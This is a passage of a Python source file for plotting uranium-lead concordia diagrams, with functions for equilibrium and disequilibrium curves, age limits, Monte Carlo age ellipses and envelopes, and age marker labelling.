np.sqrt(((x2 - x1) / xspan) ** 2 + ((y2 - y1) / yspan) ** 2) / (2. * h)\n return v\n\n\ndef eq_equi_points(t1, t2, xlim, ylim, diagram, ngp=500_000, n=500):\n \"\"\"\n Uses numerical method to obtain age points that are approximately evenly\n spaced in x, y along equilibrium U-Pb concordia between age limits t1 and t2.\n \"\"\"\n # TODO: could this be done analytically too?\n assert t2 > t1\n t = np.linspace(t1, t2, ngp)\n # suppress numpy warnings\n with np.errstate(all='ignore'):\n dr = eq_velocity(t, xlim, ylim, diagram)\n # Cumulative integrated area under eq_velocity curve (aka cumulative\n # \"distance\") at each t_j from t1 to t2:\n cum_r = integrate.cumtrapz(dr, t, initial=0)\n # Divide cumulative area under eq_velocity curve into equal portions.\n rj = np.arange(n + 1) * cum_r[-1] / n\n # Find t_j value at each r_j:\n idx = np.searchsorted(cum_r, rj, side=\"left\")\n idx[-1] = ngp - 1 if idx[-1] >= ngp else idx[-1]\n t = t[idx]\n x, y = eq_xy(t, diagram)\n return t, x, y\n\n\ndef eq_age_limits(ax, diagram='tw', tlim=(0.001, 4600.)):\n \"\"\"\n\n \"\"\"\n assert diagram in ('tw', 'wc'), \"diagram must be 'wc' (Wetheril) or 'tw' (Tera-Wasserburg)\"\n\n ax_xmin, ax_xmax = ax.get_xlim()\n ax_ymin, ax_ymax = ax.get_ylim()\n\n # --- testing ----\n # tt = np.linspace(1e-03, 4.6e3, 100_000)\n # xx, yy = eq_xy(tt, diagram)\n # ax.plot(xx, yy, 'ro')\n # ax.get_figure().show()\n # -----------\n\n # cx_min, cy_max = eq_xy(tlim[1], diagram)\n # cx_max, cy_min = eq_xy(tlim[0], diagram)\n cx_min, cy_min = eq_xy(tlim[0], diagram)\n cx_max, cy_max = eq_xy(tlim[1], diagram)\n if diagram == 'tw':\n cx_min, cx_max = cx_max, cx_min\n\n # rest ax limits if they extend past hard concordia limits:\n if ax_xmin < cx_min:\n ax_xmin = cx_min\n if ax_xmax > cx_max:\n ax_xmax = cx_max\n if ax_ymin < cy_min:\n ax_ymin = cy_min\n if 
ax_ymax > cy_max:\n ax_ymax = cy_max\n\n t_min, t_max = None, None\n\n if diagram == 'tw':\n\n t_xmax = 1. / cfg.lam238 * np.log(1. / ax_xmax + 1.)\n t_xmin = 1. / cfg.lam238 * np.log(1. / ax_xmin + 1.)\n\n # check bottom left corner of ax is not above / right of concordia curve\n if eq_xy(t_xmin, diagram)[1] < ax_ymin:\n return 1, [t_min, t_max]\n # check top right corner of ax is not below / left of concordia curve\n if eq_xy(t_xmax, diagram)[1] > ax_ymax:\n return 1, [t_min, t_max]\n\n # check curve goes through ax_xmax b/w ylim\n if ax_ymin < eq_xy(t_xmax, diagram)[1] < ax_ymax:\n t_min = t_xmax\n # check if curve intersects ymin b/w xlim\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[1] - ax_ymin,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_min = r[0]\n else:\n return -1, [t_min, t_max]\n\n # get max t value\n if ax_ymin < eq_xy(t_xmin, diagram)[1] < ax_ymax:\n t_max = t_xmin\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[1] - ax_ymax,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_max = r[0]\n else:\n return -1, [t_min, t_max]\n\n elif diagram == 'wc':\n\n t_ymax = 1. / cfg.lam238 * np.log(ax_ymax + 1.)\n t_ymin = 1. / cfg.lam238 * np.log(ax_ymin + 1.)\n\n # check bottom left corner of axes is not above / left of concordia curve\n if eq_xy(t_ymin, diagram)[0] > ax_xmax:\n return 1, [t_min, t_max]\n # check top left corner of axes is not below / left of concordia curve\n if eq_xy(t_ymax, diagram)[0] < ax_xmin:\n return 1, [t_min, t_max]\n\n # get min t value\n # check curve goes through ax_ymin b/w xlim\n if ax_xmin < eq_xy(t_ymin, diagram)[0] < ax_xmax:\n t_min = t_ymin\n # check if curve intersects ymin b/w xlim\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[0] - ax_xmin,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_min = r[0]\n else:\n return -1, [t_min, t_max]\n\n # get max t value\n if ax_xmin < eq_xy(t_ymax, diagram)[1] < ax_xmax:\n t_max = t_ymax\n else:\n r = optimize.brentq(lambda t: eq_xy(t, diagram)[0] - ax_xmax,\n 4.6e3, 1e-3, full_output=True, disp=False)\n if r[1].converged:\n t_max = r[0]\n else:\n return -1, [t_min, t_max]\n\n return 0, [t_min, t_max]\n\n\n#==============================================================\n# Diseq concordia functions\n#==============================================================\n\ndef diseq_xy(t, A, meas, diagram):\n \"\"\"Return x, y for given t along disequilibrium concordia curve.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'tw':\n x = 1. / ludwig.f(t, A[:-1], meas=meas)\n y = ludwig.g(t, A[-1]) * x / cfg.U\n elif diagram == 'wc':\n y = ludwig.f(t, A[:-1], meas=meas)\n x = ludwig.g(t, A[-1])\n return x, y\n\n\ndef diseq_dxdt(t, A, meas, diagram):\n \"\"\"\n Return x given t along disequilibrium concordia curve.\n Used e.g. to compute dx/dt\n \"\"\"\n assert diagram == 'tw'\n def conc_x(t):\n x, _ = diseq_xy(t, A, meas, diagram)\n return x\n h = abs(t) * np.sqrt(np.finfo(float).eps)\n dxdt = misc.cdiff(t, conc_x, h)\n return dxdt\n\n\ndef diseq_slope(t, A, meas, diagram):\n \"\"\"\n Compute tangent to concordia at given t. I.e. 
dy/dx for given t.\n \"\"\"\n h = np.sqrt(np.finfo(float).eps) * t\n x2, y2 = diseq_xy(t + h, A, meas, diagram)\n x1, y1 = diseq_xy(t - h, A, meas, diagram)\n return (y2 - y1) / (x2 - x1)\n\n\ndef diseq_age_ellipse(t, A, sA, meas, trials=1_000, pA=None, diagram='tw'):\n \"\"\"\n Plot disequilibrium concordia marker as an \"age ellipse\" which provides\n a visual representation of uncertainty in x-y for given t value arising from\n uncertainties in activity ratio values.\n \"\"\"\n assert diagram == 'tw', 'can only plot ellipses for Tera-Wasserburg diagram ' \\\n 'at present'\n\n # do monte carlo simulation\n #TODO: should take in activity ratios?\n if pA is None:\n pA = cfg.rng.normal(A, sA, (trials, 4))\n else:\n assert pA.shape[1] == 4\n\n flags = np.zeros(trials)\n\n if meas[0]:\n a234_238_i = useries.aratio48i(t, pA[:, 0])\n flags = np.where(a234_238_i < 0, -1, 0)\n if meas[1]:\n a230_238_i = useries.aratio08i(t, pA[:, 0], pA[:, 1], init= not meas[0])\n flags = np.where((a230_238_i < 0) & (flags == 0), -2, 0)\n\n if sum(flags != 0) > (0.99 * trials):\n msg = f'{sum(flags != 0)}/{trials} negative activity ratio soln. ' \\\n f'values in age ellipse t = {t:.3f} Ma'\n warnings.warn(msg)\n\n x, y = diseq_xy(t, A, meas, 'tw') # centre point\n xpts, ypts = diseq_xy(t, np.transpose(pA), meas, 'tw')\n\n V_xy = np.cov(np.array([xpts, ypts]))\n sx, sy = np.sqrt(np.diag(V_xy))\n r_xy = V_xy[0, 1] / (sx * sy)\n\n if np.isclose(abs(r_xy), 1.0):\n #TODO: review this\n r_xy = (1. - 1e-08) * np.sign(r_xy)\n\n # reset r_xy for special cases:\n if sA[-1] == 0:\n if any(np.asarray(sA[:2]) != 0):\n r_xy = 1. - 1e-08\n else:\n if all((x == 0 for x in sA[:2])):\n sx = 0.\n r_xy = 0.\n\n return x, y, sx, sy, r_xy\n\n\ndef diseq_equi_points(t1, t2, xlim, ylim, A, meas, diagram, ngp=500_000, n=500):\n \"\"\"\n Return ages that give equally spaced x, y points along disequilbrium\n concordia between upper and lower age limits.\n \"\"\"\n # TODO: this needs further debugging, sometimes returns t of length n + 1,\n # also occasionally returns duplicate t values.\n assert t2 > t1\n t = np.linspace(t1, t2, ngp)\n # suppress numpy warnings\n with np.errstate(all='ignore'):\n dr = diseq_velocity(t, xlim, ylim, A, meas, diagram)\n # Cumulative integrated area under eq_velocity curve (aka cumulative\n # \"distance\") at each t_j from t1 to t2:\n cum_r = integrate.cumtrapz(dr, t, initial=0)\n # Divide cumulative area under eq_velocity curve into equal portions.\n rj = np.arange(n + 1) * cum_r[-1] / n\n # Find t_j value at each r_j:\n idx = np.searchsorted(cum_r, rj, side=\"left\")\n idx[-1] = ngp - 1 if idx[-1] >= ngp else idx[-1]\n t = t[idx]\n x, y = diseq_xy(t, A, meas, diagram)\n return t, x, y\n\n\ndef diseq_velocity(t, xlim, ylim, A, meas, diagram):\n \"\"\"\n Estimate dr/dt, which is \"eq_velocity\" along a diseq concordia curve in\n x-y space. Uses axis coordinates to circumvent scaling issues.\n \"\"\"\n h = 1e-08 * t\n xspan = xlim[1] - xlim[0]\n yspan = ylim[1] - ylim[0]\n x2, y2 = diseq_xy(t + h, A, meas, diagram)\n x1, y1 = diseq_xy(t - h, A, meas, diagram)\n v = np.sqrt(((x2 - x1) / xspan) ** 2 + ((y2 - y1) / yspan) ** 2) / (2. 
* h)\n return v\n\n\n#=================================\n# Concordia age bound functions\n#=================================\n\ndef diseq_age_limits(ax, A, meas, diagram='tw', tbounds=(0.010, 100.),\n max_age=10.):\n \"\"\"\n Find the age limits of a disequilibrium concordia curve segment\n that plots within the given axis limits.\n\n Uses a brute force method to find approximate limits, then refines these\n using Newton's method.\n\n \"\"\"\n assert diagram == 'tw', 'Wetheril concordia not yet implemented'\n\n ax_xmin, ax_xmax = ax.get_xlim()\n ax_ymin, ax_ymax = ax.get_ylim()\n tbounds = np.asarray(tbounds, dtype='double')\n tlim = list(tbounds)\n\n # --- testing ----\n # tt = np.logspace(np.log(1e-3), np.log(1e3), num=1_000_000, base=np.exp(1))\n # xx, yy = concordia.diseq_xy(tt, A, ~np.asarray(meas), diagram)\n # ax.plot(xx, yy, 'ro')\n # ax.get_figure().show()\n # -----------\n\n t_min, t_max = None, None\n\n # Check if tlim[1] exceeds t_max\n if max_age is not None:\n if max_age < tlim[0]:\n raise ValueError('max_age cannot be less than the first element of tlim')\n if tlim[1] > max_age:\n tlim[1] = max_age\n\n # Check if hard limits are inside plot window.\n xc, yc = diseq_xy(np.asarray(tlim), A, meas, diagram)\n if all((xc > ax_xmin) & (xc < ax_xmax) & (yc > ax_ymin) & (yc < ax_ymax)):\n return 0, tlim, tbounds\n\n # Simulate log-spaced points and check if any are inside axis bounds.\n tc = np.logspace(np.log10(tlim[0]), np.log10(tlim[1]), num=1_000_000)\n xc, yc = diseq_xy(tc, A, meas, diagram)\n inside = ((ax_xmin < xc) & (xc < ax_xmax)) & ((ax_ymin < yc) & (yc < ax_ymax))\n\n # Verify that a point has been found, if not return error code.\n if np.sum(inside) < 1:\n return 1, (t_min, t_max), tbounds\n elif np.sum(inside) > 3 and any(meas):\n # If measured 234/238 or 230/238 given, do not allow concordia curve to\n # loop back over itself. This creates plotting difficulties. Also, the loooping\n # part is usually (always?) 
associated with physically implausible initial activity\n # ratio solutions.\n\n # check if dx/dt changes sign, if so, there are multiple y for x, and\n # therefore t needs to be truncated to plot envelope\n dxdt = diseq_dxdt(tc[inside], A, meas, diagram)\n ind = np.where(np.diff(np.sign(dxdt)) != 0)[0]\n if ind.shape[0] != 0:\n if len(ind) > 1: # if multiple dx/dt changes, probably a numerical issue computing deriv.\n warnings.warn(f'multiple dx/dt sign changes in concordia found')\n else:\n tlim[1] = float(tc[inside][ind])\n tbounds[1] = tlim[1]\n warnings.warn(f'concordia truncated at t = {tlim[1]:.3f} because dx/dt changes sign')\n # re-do search for inside points\n tc = np.logspace(np.log10(tlim[0]), np.log10(tlim[1]), num=1_000_000)\n xc, yc = diseq_xy(tc, A, meas, diagram)\n inside = ((ax_xmin < xc) & (xc < ax_xmax)) & ((ax_ymin < yc) & (yc < ax_ymax))\n\n # Get indices of inside / outside change points for different cases:\n min_inside, max_inside = False, False\n idx = np.where(np.diff(inside) != 0)[0]\n cp = len(idx)\n if cp == 0:\n return 1, [t_min, t_max], tbounds\n elif cp == 1:\n # Either tlim[0] or tlim[1] is inside axis bounds.\n if inside[0]:\n min_inside = True\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n else:\n max_inside = True\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = tlim[1]\n elif cp == 2:\n if inside[0]:\n # must be more than one segment - only use first!\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n tlim[1] = tc[idx[0] + 1]\n else:\n # Neither tlim[0] nor tlim[1] are in axis bounds.\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = (tc[idx[1]], tc[idx[1] + 1])\n elif cp == 3 and inside[0]:\n # must be more than one segment - only use first!\n t_min = tlim[0]\n t_max = (tc[idx[0]], tc[idx[0] + 1])\n tlim[1] = tc[idx[0] + 1]\n elif cp in (3, 4):\n # Neither tlim[0] nor tlim[1] are in axis bounds.\n t_min = (tc[idx[0]], tc[idx[0] + 1])\n t_max = (tc[idx[1]], tc[idx[1] + 1])\n tlim[1] = tc[idx[1] + 1]\n\n elif cp > 4:\n raise RuntimeError('cannot have more than four boundary points')\n\n if not min_inside:\n try:\n t_min = refine_age_lim(ax.get_xlim(), ax.get_ylim(), *t_min, A,\n meas, which='lower')\n except ConvergenceError:\n warnings.warn('lower concordia age limit could not be refined')\n t_min = np.min(t_min)\n if not max_inside:\n try:\n t_max = refine_age_lim(ax.get_xlim(), ax.get_ylim(), *t_max, A,\n meas, which='upper')\n except ConvergenceError:\n warnings.warn('upper concordia age limit could not be refined')\n t_max = np.min(t_max)\n\n assert t_max > t_min, 'lower concordia age limit should be smaller than ' \\\n 'upper limit'\n\n return 0, [t_min, t_max], tbounds\n\n\ndef refine_age_lim(xlim, ylim, t1, t2, A, meas, which='lower'):\n \"\"\"\n Refine limits using newton\n \"\"\"\n xmin, xmax = xlim\n ymin, ymax = ylim\n\n # refine lower\n x1, y1 = diseq_xy(t1, A, meas, 'tw')\n x2, y2 = diseq_xy(t2, A, meas, 'tw')\n t0 = np.mean((t1, t2))\n\n # Lower t limit. 
t2 inside axis bounds, t1 is outside.\n if x1 > x2:\n # check intersection with xmin\n if which == 'lower':\n fmin, dfmin = min_tax(xmax, meas, diagram='tw')\n else:\n fmin, dfmin = min_tax(xmin, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if ymin < diseq_xy(r[0], A, meas, 'tw')[1] < ymax:\n return r[0]\n\n if ((y2 > y1) and not (ymin < y1 < ymax)) or ((y2 < y1) and (ymin < y1 < ymax)):\n # check intersection with ymin\n fmin, dfmin = min_tay(ymin, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if xmin < diseq_xy(r[0], A, meas, 'tw')[0] < xmax:\n return r[0]\n else:\n # check intersection with ymax\n fmin, dfmin = min_tay(ymax, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, t0, dfmin, full_output=True, disp=False,\n args=([A]))\n if r[1].converged:\n if xmin < diseq_xy(r[0], A, meas, 'tw')[0] < xmax:\n return r[0]\n\n raise ConvergenceError('could not refine concordia age limits')\n\n\ndef min_tay(y, meas, diagram='tw'):\n \"\"\"\n Minimisation function to solve concordia age for given y value.\n \"\"\"\n def fmin(t, A):\n return diseq_xy(t, A, meas, diagram)[1] - y\n def dfmin(t, A):\n #TODO: replace with analytical derivative\n return misc.cdiff(t, fmin, 1e-08 * t, A)\n return fmin, dfmin\n\n\ndef min_tax(x, meas, diagram='tw'):\n \"\"\"\n Minimisation function to solve concordia age for given x value.\n \"\"\"\n def fmin(t, A):\n return diseq_xy(t, A, meas, diagram)[0] - x\n def dfmin(t, A):\n #TODO: replace with analytical derivative\n return misc.cdiff(t, fmin, 1e-08 * t, A)\n return fmin, dfmin\n\n\n#====================\n# Concordia markers\n#====================\n\ndef generate_age_markers(ax, t1, t2, tbounds, diagram, eq=True,\n point_markers=True, ell=False, A=None, sA=None, meas=None,\n marker_ages=(), age_prefix='Ma', auto=True):\n \"\"\"\n Generate appropriately spaced concordia age markers and label text.\n\n Parameters\n ----------\n t1 : float\n lower concordia age in plot,\n t2 : float\n upper concordia age\n ell : bool\n plot age ellipses\n\n \"\"\"\n assert point_markers or ell, 'one of point_markers or ell must be True'\n assert t2 > t1, 'upper age limit must be greater than lower age limit'\n age_unit = 1. 
if age_prefix == 'Ma' else 1e-3\n dt = None\n\n if not auto: # manual age markers\n\n if len(marker_ages) == 0:\n raise ValueError('ages cannot be empty if auto set to False')\n for i, x in enumerate(marker_ages):\n try:\n fx = float(x) * age_unit\n except ValueError:\n raise ValueError(f'could not convert marker age {x} to a'\n f'number')\n else:\n if not cfg.conc_age_bounds[0] < fx < cfg.conc_age_bounds[1]:\n msg = f'marker age {x} {age_prefix} outside ' \\\n f'conc_age_bounds value set in config'\n warnings.warn(msg)\n\n t_sorted = np.sort(np.array(marker_ages, dtype=np.double))\n t = t_sorted * age_unit\n t_sorted = t_sorted[(t1 < t_sorted) & (t_sorted < t2)]\n n_inside = len(t[np.logical_and(t1 < t, t2 > t)])\n # which markers to label:\n if n_inside > cfg.every_second_threshold:\n add_label = [True if i % 2 == 0 else False for i, t in enumerate(t)]\n else:\n add_label = [True for t in t]\n\n else: # find auto marker locations\n\n max_markers = 8 if ell else 12\n dt = age_marker_spacing(ax, t1, t2, diagram, A=A, meas=meas, eq=eq,\n max_markers=max_markers)\n\n # Get marker age points:\n t_start = misc.round_down(np.floor(t1 / dt) * dt, 5)\n t = np.arange(t_start, t2 + dt, dt)\n\n # Reset to 0 if sufficiently close in order to avoid labelling problems.\n t = [0. if abs(x) < 1e-9 else x for x in t]\n t = np.array([round(x, 10) for x in t]) # round ages to get around f.p. issues\n\n # If labelling every second, check which label to start with. Preference\n # starting on label with less significant digits, then preference starting\n # on label ending in 1, and finally preference starting on even number.\n n = len(t)\n\n start_idx = 0\n step = 1\n if n > cfg.every_second_threshold:\n step = 2\n t0 = misc.round_down(float(t[0]), 8)\n t1 = misc.round_down(float(t[1]), 8)\n s0 = str(t0).rstrip(\"0\") # first marker in sequence\n s1 = str(t1).rstrip(\"0\") # second marker in sequence\n\n if s0 == '':\n # if initial t is 0\n start_idx = 1\n elif s0[-1] == '.':\n start_idx = 0\n elif s1[-1] == '.':\n start_idx = 1\n elif len(s0) > len(s1):\n start_idx = 1\n elif float(s0[-1]) % 2 > 0 and float(s1[-1]) % 2 == 0:\n start_idx = 1\n\n # Add extra markers to ends, in case they are partly displayed in plot\n # window - but this should not affect label starting age.\n # if not ell:\n t = np.arange(t_start - dt, t2 + 2 * dt, dt)\n start_idx = 1 if start_idx == 0 else 0\n\n t = np.array([round(x, 10) for x in t]) # round ages again\n t = t[(t >= tbounds[0]) & (t <= tbounds[1])] # double check bounds\n num_t = len(t) # new number of markers\n\n # list of bools indicating which markers to add a label to:\n if n > cfg.every_second_threshold:\n add_label = [True if (i - start_idx) % step == 0\n else False for i in range(num_t)]\n else:\n add_label = [True] * len(t)\n\n markers_dict = {'diagram': diagram,\n 't': t,\n 'dt': dt,\n 'ell': ell,\n 'point_markers': point_markers,\n 'eq': eq,\n 'A': A,\n 'sA': sA,\n 'meas': meas,\n 'add_label': add_label,\n 'age_prefix': age_prefix}\n\n return markers_dict\n\n\ndef estimate_marker_spacing(tspan):\n \"\"\"\n Get initial estimate of appropriate concordia marker spacing.\n \"\"\"\n dt = 10 ** misc.get_exponent(tspan) / 8\n while abs(tspan / dt) > 12:\n dt *= 2\n return misc.round_down(dt, 8)\n\n\ndef age_marker_spacing(ax, t1, t2, diagram, A=None, meas=None, eq=True,\n max_markers=12):\n \"\"\"\n Estimate reasonable concordia age marker spacing given upper and lower\n age marker limits.\n\n \"\"\"\n tspan = t2 - t1\n t_ratio = t2 / t1\n # First estimate of spacing 
between markers, dt.\n dt = estimate_marker_spacing(tspan)\n if t_ratio > 5 and t2 > 1:\n dt = estimate_marker_spacing(tspan / 4)\n # Increase spacing if too many markers.\n while abs(tspan / dt) > max_markers:\n dt *= 2\n\n # Check dt after calculaing the fraction of x, y axis spanned by\n # concordia and refine if necessary...\n if eq:\n x_tmin, y_tmin = eq_xy(t1, diagram)\n x_tmax, y_tmax = eq_xy(t2, diagram)\n else:\n x_tmin, y_tmin = diseq_xy(t1, A, meas, diagram)\n x_tmax, y_tmax = diseq_xy(t2, A, meas, diagram)\n\n x_frac = abs((x_tmin - x_tmax) / (ax.get_xlim()[1] - ax.get_xlim()[0]))\n y_frac = abs((y_tmin - y_tmax) / (ax.get_ylim()[1] - ax.get_ylim()[0]))\n\n # Refine dt using some rules of thumb.\n k = 0.6\n for i in range(1, 5):\n k *= 0.5\n if x_frac < k and y_frac < k:\n dt *= 2\n\n return dt\n\n\ndef plot_age_markers(ax, markers_dict, p=0.95, pA=None):\n \"\"\"\n Add age markers and/or age ellipses to plot.\n\n Parameters\n ----------\n markers : dict\n age marker properties, typically returned from calling get_age_markers\n\n \"\"\"\n # unpack markers dict\n diagram = markers_dict['diagram']\n eq = markers_dict['eq']\n age_prefix = markers_dict['age_prefix']\n A = markers_dict['A']\n sA = markers_dict['sA']\n meas = markers_dict['meas']\n t = markers_dict['t']\n ell = markers_dict['ell']\n point_markers = markers_dict['point_markers']\n add_label = markers_dict['add_label']\n \n assert ell or point_markers, 'one of ell or point_markers must be True'\n n = len(t)\n\n # Plot markers / ellipses.\n if eq:\n x, y = eq_xy(t, diagram)\n else:\n x, y = diseq_xy(t, A, meas, diagram)\n\n if ell: # plot age markers as ellipses\n # pre-allocate arrays to store ellipse params for labelling\n ell_obj = []\n bbox = []\n sx = np.empty(n)\n sy = np.empty(n)\n r_xy = np.empty(n)\n\n for i, age in enumerate(t):\n if eq:\n sx[i], sy[i], r_xy[i] = eq_age_ellipse(age, diagram)\n else:\n _, _, sx[i], sy[i], r_xy[i] = diseq_age_ellipse(age, A, sA, meas, pA=pA)\n ellipse = plotting.confidence_ellipse(ax, x[i], sx[i], y[i], sy[i],\n r_xy[i], p=p, mpl_label=f'age ellipse, {t[i]:.6f} Ma',\n ellipse_kw=cfg.conc_age_ellipse_kw,\n outline_alpha=False)\n ell_obj.append(ellipse)\n if point_markers:\n ax.plot(x[i], y[i], label='concordia marker', **cfg.conc_markers_kw)\n\n else: # plot age markers only\n ax.plot(x, y, label='concordia marker', **cfg.conc_markers_kw)\n\n # Generate marker label text.\n age_unit = 1e-3 if age_prefix == 'ka' else 1.\n if sum(add_label) > 0:\n t_rounded = np.array([float(misc.round_down(age / age_unit, 8))\n for age in t])\n n_dec = np.max([misc.num_dec_places(x) for x in t_rounded[add_label]\n if add_label])\n\n if cfg.prefix_in_label:\n label_format = '{{:,.{}f}} {{}}'.format(n_dec)\n text = [label_format.format(x, age_prefix) for x in t_rounded]\n\n else:\n label_format = '{{:,.{}f}}'.format(n_dec)\n text = [label_format.format(x) for x in t_rounded]\n\n markers_dict['text'] = text\n\n markers_dict['x'] = x\n markers_dict['y'] = y\n markers_dict['add_label'] = add_label\n markers_dict['age_ellipses'] = ell\n\n if ell:\n markers_dict['bbox'] = bbox\n markers_dict['ell_obj'] = ell_obj\n \n return markers_dict\n\n\n#=====================\n# Concordia envelope\n#=====================\n\ndef plot_envelope(ax, diagram, xc=None, npts=100):\n \"\"\"\n Plot concordia uncertainty envelope which displays effect of decay constant\n errors.\n \"\"\"\n if xc is None:\n xc = np.linspace(*ax.get_xlim(), num=100, endpoint=True)\n t = eq_age_x(xc, diagram)\n x, y = eq_xy(t, diagram)\n dy = 
1.96 * eq_envelope(xc, diagram)\n ax.fill_between(xc, y + dy, y - dy, label='concordia envelope',\n **cfg.conc_env_kw)\n ax.plot(xc, y - dy, **cfg.conc_env_line_kw, label='concordia envelope line')\n ax.plot(xc, y + dy, **cfg.conc_env_line_kw, label='concordia envelope line')\n\n\ndef plot_diseq_envelope(ax, ct, cx, cy, t0, t1, tbounds, A, sA, meas, diagram='tw',\n trials=10_000, spaghetti=False):\n \"\"\"\n Plot disequilibrium concordia envelope.\n \"\"\"\n assert diagram == 'tw', 'concordia diagram must be in Tera-Wasserburg form'\n\n nx = cx.shape[0]\n\n # simulate activity ratios\n # TODO: should allow simulated activity ratios to be passed in (?)\n pA = cfg.rng.normal(A, sA, (trials, 4))\n\n # ---- testing -----\n if spaghetti:\n for i in range(trials):\n t = np.linspace(t0, t1, trials)\n xy = diseq_xy(t, pA[i, :], meas, 'tw')\n ax.plot(*xy, lw=0.5)\n # ------------------\n\n # get envelope limits\n y_upper = np.zeros(nx)\n y_lower = np.zeros(nx)\n # TODO: use vectorised approach\n for i in range(nx):\n y_upper[i], y_lower[i] = mc_concordia_envelope(cx[i], ct[i], pA, meas,\n ax=ax)\n\n ok = ~np.isnan(y_lower) & ~np.isnan(y_upper)\n\n # plot envelope\n ax.plot(cx[ok], y_lower[ok], **cfg.conc_env_line_kw, label='concordia envelope line')\n ax.plot(cx[ok], y_upper[ok], **cfg.conc_env_line_kw, label='concordia envelope line')\n\n return pA\n\n\ndef mc_concordia_envelope(x, t0, pA, meas, ax=None):\n \"\"\"\n t is on the concordia curve\n \"\"\"\n trials = pA.shape[0]\n fmin, dfmin = min_tax(x, meas, diagram='tw')\n with np.errstate(all='ignore'):\n r = optimize.newton(fmin, np.full(trials, t0, dtype='double'), dfmin,\n full_output=True, disp=False, args=([np.transpose(pA)]))\n if np.sum(r.converged) < (0.95 * trials):\n warnings.warn(f'less than 95% of Monte Carlo envelope trials succesful at x = {x:.3f}')\n y_upper, y_lower = np.nan, np.nan\n else:\n conv = r.converged & ~np.isnan(r.root)\n t = r.root[conv]\n # assert np.allclose(x, 1. / ludwig.f(t, pA[:, :3][conv]), meas=meas)\n y = ludwig.g(t, pA[:, -1][conv]) * x / cfg.U\n y_lower, y_upper = np.quantile(y, (0.025, 0.975))\n return y_upper, y_lower\n\n\n#==============================================================================\n# Concordia labels\n#==============================================================================\n\ndef labels(ax, markers):\n \"\"\"\n Add labels to concordia age markers. 
Uses the same offset and rotation\n for each marker.\n\n Parameters\n ----------\n markers : dict\n age marker properties\n\n \"\"\"\n # Mask out values for markers that will not be labelled.\n add_label = np.array(markers['add_label'])\n x = np.array(markers['x'])[add_label]\n y = np.array(markers['y'])[add_label]\n txt = np.array(markers['text'])[add_label]\n n = sum(add_label)\n\n ann = []\n for i in range(n):\n an = ax.annotate(txt[i], (x[i], y[i]), **cfg.conc_text_kw,\n label='concorida label')\n ann.append(an)\n markers['label_annotations'] = ann\n return markers\n\n\ndef individualised_labels(ax, markers_dict, diagram, eq=True, A=None,\n meas=None, remove_overlaps=True):\n \"\"\"\n Plot concordia age labels using individualised position and rotation.\n\n Notes\n -----\n This routine doesn't currently work well for disequilibrium concordia curves\n that curve back around.\n \"\"\"\n assert diagram in ('tw', 'wc')\n fig = ax.get_figure()\n ell = markers_dict['age_ellipses']\n\n # Mask out values for markers_dict that will not be labelled.\n add_label = np.array(markers_dict['add_label'])\n if add_label.size == 0:\n warnings.warn('no labels to add within concordia age bounds')\n return\n x = np.array(markers_dict['x'])[add_label]\n y = np.array(markers_dict['y'])[add_label]\n t = np.array(markers_dict['t'])[add_label]\n txt = np.array(markers_dict['text'])[add_label]\n\n # Calculate some useful axes properties.\n xmin, xmax = ax.get_xlim()\n xspread = xmax - xmin\n ymin, ymax = ax.get_ylim()\n yspread = ymax - ymin\n\n # Get axis window extents in display points. Then calculate a \"scale factor\"\n # for converting slopes from data coordinates to display coordinates.\n ax_bbox = ax.get_window_extent()\n aspect_ratio = ax_bbox.height / ax_bbox.width\n scale_factor = yspread / xspread / aspect_ratio\n\n # Only pass in text properties to annotate(). We do not want to pass\n # in rotation or position properties for indidividualised labels.\n # TODO: consider if alignment properties could still be passed in?\n allowed_keys = ['alpha', 'backgroundcolor', 'color', 'c',\n 'fontfamily', 'family', 'fontsize', 'size',\n 'stretch', 'fontweight', 'weight', 'zorder',\n 'annotation_clip', 'clip_on']\n text_kw = {}\n for k, v in cfg.conc_text_kw.items():\n if k in allowed_keys:\n text_kw[k] = v\n\n # Create labels\n label_annotations = []\n\n n = sum(add_label)\n if ell:\n ell_obj = [b for (a, b) in zip(add_label, markers_dict['ell_obj']) if a]\n\n # Get annotation bbox properties for dummy annotation. 
Used to\n # calculate annotation box height (parallel to y-axis) in display\n # coordinates.\n an = ax.annotate(txt[0], (x[0], y[0]), va='center', ha='center',\n rotation=0, **text_kw)\n # fig.canvas.draw()\n anbbox = an.get_window_extent(renderer=fig.canvas.get_renderer())\n h = anbbox.height # display coordinates\n an.remove()\n\n # TODO: alignment kwargs could be added back in here?\n\n text_outline = None\n # ------- testing only ------\n # text_outline = dict(ec='red', lw=0.5, pad=0.0, fc='none')\n # ----------------------------------\n\n # add each marker\n for i in range(n):\n # Add annotation to figure at arbitraty location (on top of marker),\n # so we can get it's bounding box dimensions.\n an = ax.annotate(txt[i], (x[i], y[i]), va='center', ha='center',\n label='concordia label', rotation=0, bbox=text_outline,\n **text_kw)\n # anbbox = an.get_window_extent()\n # fig.canvas.draw()\n an_bbox = an.get_window_extent(renderer=fig.canvas.get_renderer())\n w = an_bbox.width\n x_disp, y_disp = ax.transData.transform((x[i], y[i]))\n\n # ---testing---\n # ax.plot(x[i], y[i], 'bo', ms=2, zorder=100)\n # ----\n\n # Get concordia slope (i.e. tangent) at t.\n if eq:\n slope = eq_slope(t[i], diagram)\n else:\n slope = diseq_slope(t[i], A, meas, diagram)\n\n # angle of concordia at marker location in display coords:\n # angle = np.arctan(slope / scale_factor) * 180 / np.pi\n angle = np.arctan2(slope, 1.)\n angle_disp = np.arctan2(slope / 